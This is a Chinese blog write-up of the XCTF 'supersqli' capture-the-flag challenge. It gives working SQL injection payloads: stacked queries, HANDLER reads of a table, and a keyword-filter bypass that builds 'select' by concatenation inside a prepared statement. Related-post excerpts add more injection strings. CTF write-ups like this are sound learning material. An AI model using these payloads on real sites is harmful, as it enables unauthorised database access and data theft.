XCTF2-web supersqli

最新推荐文章于 2024-06-11 21:29:27 发布
最新推荐文章于 2024-06-11 21:29:27 发布
阅读量536 收藏
点赞数
分类专栏: CTF练习记录 文章标签: mysql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/orchid_sea/article/details/128082840
版权

supersqli

进入场景

在这里插入图片描述一个查询表单界面

1. 判断注入点

使用 and 1=1判断注入点,存在单引号布尔注入
在这里插入图片描述
在这里插入图片描述

2.判断字段数

使用order by判断字段数,测试出来是2个字段
在这里插入图片描述

3. 尝试联合注入

在这里插入图片描述
发现对 select|update|delete|drop|insert|where|./i都进行了正则匹配,

3. 换成堆叠注入
show databases;
show tables;
show columns from table;
4.爆数据库

发现数据库supersqli,与题目对应
在这里插入图片描述

6. 爆表

存在两个表,words表和1919810931114514表,分别查看
在这里插入图片描述

7.爆字段

words表中没有flag,数字表中存在flag字段。

show columns from `1919810931114514`;
或
desc `1919810931114514`;

在这里插入图片描述对数字表1919810931114514用反引号

8.爆内容
Handler函数代替查询

由于flag在第一个表的第一行,可以使用handler函数。

mysql除可使用select查询表中的数据,也可使用handler语句,这条语句使我们能够一行一行的浏览一个表中的数据,不过handler语句并不具备select语句的所有功能。它是mysql专用的语句,并没有包含到SQL标准中。

通过handler语句查询users表的内容:
handler users open as yunensec; #指定数据表进行载入并将返回句柄重命名
handler yunensec read first; #读取指定表/句柄的首行数据
handler yunensec read next; #读取指定表/句柄的下一行数据
handler yunensec read next; #读取指定表/句柄的下一行数据
...
handler yunensec close; #关闭句柄


?inject=-1';handler `1919810931114514` open;handler `1919810931114514` read first; --+

在这里插入图片描述

预编译查询
?inject=-1';set @sql =concat('sel','ect flag from `1919810931114514`;'); Prepare mmm from @sql;execute mmm; --+

在这里插入图片描述

777sea
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Xctf练习sql注入--supersqli
weixin_45694388的博客
12-28 246
三种方法 方法一 =1 回显正常 =1’回显不正常,报sql语法错误 =1’ --+ 回显正常,说明有sql注入点,应该是字符型注入(# 不能用) =1’ order by 3 --+ 回显失败,说明有2个注入点 =1’ union select 1,2 --+ 回显显示过滤语句: =1’; show databases --+ 爆数据库名 =-1’; show tables --+ 绕过过滤,显示表下的列名 =1’;show columns from words --+ 尝试堆叠
XCTF-mobile app2
01-03
app2-安卓逆向1.提取文件2.分析文件3.分析XML文件4.经过验证得到flag5.其他解法 下载地址:点此下载 1.提取文件 更改app安装包后缀为zip 把这3个文件解压出来 然后使用dex2jar将dex文件转换为jar文件,得到一个jar...
CTF每日练习之“ezsql“-regexp注入
LCW991207的博客
08-27 373
CTF每日练习(8月29日) "ezsql"-regexp注入
xctf攻防世界easysql wp
sash1mi
02-20 1799
xctf攻防世界easysql wp 考察知识点: SQL注入 二次注入 python脚本 访问题目地址 有注册和登录两个功能 经测试发现该题目存在二次注入 https://www.jianshu.com/p/3fe7904683ac username:'k3vin"/ password:k3vin email:k3vin 注册成功后有一个修改密码的页面 修改密码,报如下错误 猜测并构造payload: 1"||extractvalue(1,concat(0x7e,(select(database
XCTF easysql注入writeup
小傅
07-16 642
我没有拿到flag,不过根据writeup的提示。。。还是没做出来。有朋友做出来了可以在下面评论。 官方提示如下 根据提示,我写了一个脚本,脚本代码如下,这个脚本可以在代码里修改用户名和密码,直接完成在网站上用户名和密码的创建和登录以及修改密码。 # -*-coding:utf-8-*- import requests #cookiesq全局变量不用改 url = "http://1...
[GYCTF2020]Ezsqli(Mysql逐位比较)
D.MIND 的博客
04-23 499
前言 用到异或注入、bool盲注,这题我感觉最重要的还是理解mysql是如何比较字符串的 与利用 逐位比较 来配合盲注 文章目录前言`sys.schema_table_statistics_with_buffer`查表mysql字符串 逐位比较大小总结 这题关键过滤了union 、if 、sleep与 information,当然常规的or 和 and也是过滤了的 一开始看到 if 和sleep被过滤了就没有往延时注入、union注入上想 异或注入就成了我的首选! 测试一下 id=1 ^ 1# Error
XCTF-Web-supersqli
m0_52016680的博客
03-09 129
根据题目可知这是一道sql注入题。 首先进行单引号判断,选择用burpsuite的repeater重发,方便改注入语句。 所用语句 ' #图一 1' and '1'='1 #图2 根据报错信息看出就是单引号闭合的字符型注入,继续爆列数。 1' order by 1 #回显正常 1' order by 2 #回显正常 1' order by 3 #报错,说明有两列 然后就是爆库名字段名了 首先尝试联合查询 -1' union select 1,2 --+ 发现.
XCTF-Web-高手区-supersqli
1stPeak's Blog
06-21 700
题目 解题 1、使用常规的SQL注入操作进行注入,我们测试一下单引号 根据返回显示,我们可以判断目标源码中的SQL语句是字符型的,使用单引号闭合 我们本地使用mysql测试如下 2、使用#、--进行测试 发现报错,直接试试编码,将#或--替换为%23或--+ 3、接下来使用order by判断字段数 可以发现,存在两个字段数 4、使用union select判断哪个位置的字段可以进行注入 发现存在过滤,将我的语句过滤了 5、使用堆叠注入 (1)查看所有数据库名 (2)查看所有表名 (3
xctf-web(高手进阶区)-supersqli
丶没胡子的猫
11-15 196
xctf:https://adworld.xctf.org.cn/ 输入单引号,发现报错 返回正常: /?inject=1' and 1=1--+ 报错: /?inject=1' and 1=2--+ order by 3 报错,order by 2正常 ?inject=1' order by 2--+ 利用select 去查看的出现正则匹配,不允许使用以下字符 ...
XCTF-HW-pipeline附件
11-09
附件
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
xctf_huaweicloud-qualifier-2020
05-31
xctf_huaweicloud-qualifier-2020写上去译文原始码类别名称网址分数解决了PWN cp 游戏 快速执行 Fastga mysqli 迷你人 nday_container_escape qemu-zzz 网络隐藏云我的1 我的2 派尔 网壳 :cross_mark: 杂项以太网 谁...
mysql-线上常用运维sql-2
jll126的博客
06-11 360
MySQL中,直接查询当前正在执行的事务可能不是非常直观,因为MySQL并没有提供直接的命令或系统视图来列出所有正在运行的事务。但是,你可以通过几种方法间接地获取这些信息。
MySQL】服务器配置和管理
p_fly的博客
06-09 759
MySQL服务器通常说的是mysqld程序。mysqld 是 MySQL 数据库服务器的核心程序,负责处理客户端的请求、管理数据库和执行数据库操作。管理员可以通过配置文件和各种工具来管理和监控 mysqld 服务器的运行本文将介绍下面三个内容:服务器启动选项:可以在命令行和配置文件中指定,用于配置服务器的行为和特性。服务器系统变量:反映了启动选项的当前状态和值,其中一些变量可以在服务器运行时修改。服务器状态变量:包含了关于运行时操作的计数器和统计信息。
Mysql--基础知识点--86--慢查询
Chasing__Dreams的博客
06-11 762
mysql 慢查询
Mysql的 存储过程(procedure)
shark1978的专栏
06-09 736
存储过程(Stored Procedure)是一组为了完成特定功能的SQL语句集合,经编译后存储在数据库中,用户通过指定存储过程的名字和参数(如果有)来执行它。存储过程可以在很多数据库管理系统(DBMS)中找到,如SQL Server、Oracle、MySQL等。
MySQL】索引(上)
最新发布
开心星人的博客
06-11 753
索引是一种用于快速查询和检索数据的数据结构,排序好的数据结构。 优点:加快检索速度;通过创建唯一性索引,可以保证行数据的唯一性;通过索引列对数据进行排序,降低数据排序的成本,降低CPU的消耗 缺点:创建和维护索引需要耗费时间,本身存储也要耗费一定空间不同引擎对索引的支持情况 哈希表、有序数组、B+树、B树、红黑树,二叉树哈希表:只适用于等值查询的场景,用这种索引做不了范围查询,必须全表扫描。查询效率高有序数组:有序数组在等值查询和范围查询场景中的性能就都非常优秀,但是一旦更新数据就得挪动后面的元素,成本太高
Navicat for MySQL 11软件下载附加详细安装教程
hana134501的博客
06-07 900
数据表明数据同步和备份:Navicat支持数据同步和备份功能,能够帮助使用者将数据从一个数据库系统同步到另一个数据库系统,或者创建定期的数据备份以保护数据,它提供了选项来控制同步的方式和规则,确保数据的一致性和完整性。我们都知道Navicat for MySQL 基于Win平台,为 MySQL 量身订作,提供类似于 MySQL 的用管理界面工具,此解决方案的出现,将解放 PHP、J2EE 等软件员以及数据库设计者、管理者的大脑,降低开发成本,为使用者带来更高的开发效率。
xctf supersqli
09-01
对于 xctf supersqli,它是一个供参与者练习 SQL 注入技巧的 CTF(Capture The Flag)比赛题目。CTF比赛是一种网络安全竞赛,旨在测试参与者在各种安全领域的技能。在 xctf supersqli 中,参与者需要利用 SQL 注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值